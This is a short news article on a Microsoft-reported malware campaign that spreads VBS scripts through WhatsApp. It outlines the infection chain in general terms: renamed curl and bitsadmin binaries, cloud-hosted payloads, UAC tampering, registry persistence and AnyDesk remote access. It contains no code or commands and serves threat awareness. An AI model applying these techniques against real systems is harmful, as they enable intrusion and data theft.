Microsoft has raised concerns over a recent malware campaign that exploits WhatsApp messages to distribute harmful Visual Basic Script (VBS) files. This malicious activity, observed since late February 2026, employs these scripts to initiate a complex infection chain designed to establish persistence and allow remote control of the affected systems. However, the specific tactics used by the attackers to entice users into running these scripts remain unclear.
Exploitation Techniques and Delivery Methods
The campaign utilizes a blend of social engineering and ‘living-off-the-land’ strategies, according to the Microsoft Defender Security Research Team. By repurposing Windows utilities and retrieving payloads from reputable cloud services like AWS, Tencent Cloud, and Backblaze B2, the attackers maintain a low profile and enhance their chances of a successful breach. The malware is disseminated through WhatsApp messages, which upon execution, create concealed directories and deploy renamed Windows utilities such as ‘curl.exe’ and ‘bitsadmin.exe’ under different aliases.
Gaining System Control and Persistence
After initial access is secured, the attackers strive to sustain their presence and elevate privileges by installing harmful Microsoft Installer (MSI) packages. They accomplish this by downloading additional VBS scripts from cloud platforms using the renamed utilities. Microsoft notes that the malware then tampers with User Account Control (UAC) settings to undermine system defenses, launching ‘cmd.exe’ with elevated privileges persistently until successful UAC elevation or process termination.
Registry entries are modified to embed persistence mechanisms, ensuring the malware survives system reboots. This allows attackers to gain elevated privileges without user interaction by combining registry manipulation with UAC bypass methods, ultimately deploying unsigned MSI installers. Tools like AnyDesk may be utilized for maintaining remote access, facilitating data exfiltration or further malware deployment.
Analysis of the Threat’s Impact
This campaign showcases a sophisticated infection methodology that blends social engineering via WhatsApp, stealth tactics such as using renamed legitimate tools, and cloud-hosted payloads. The strategic use of legitimate tools and trusted platforms enables attackers to merge seamlessly with routine network activities, significantly increasing the likelihood of a successful breach.
The implications of such attacks are profound, as they allow unauthorized remote access and data theft, posing a severe threat to system integrity and user privacy. Vigilance and robust security measures are essential to mitigate such risks, emphasizing the need for user awareness and proactive defense strategies.
Microsoft’s findings underscore the importance of staying informed about emerging threats and implementing comprehensive security protocols to protect against evolving cyberattacks.
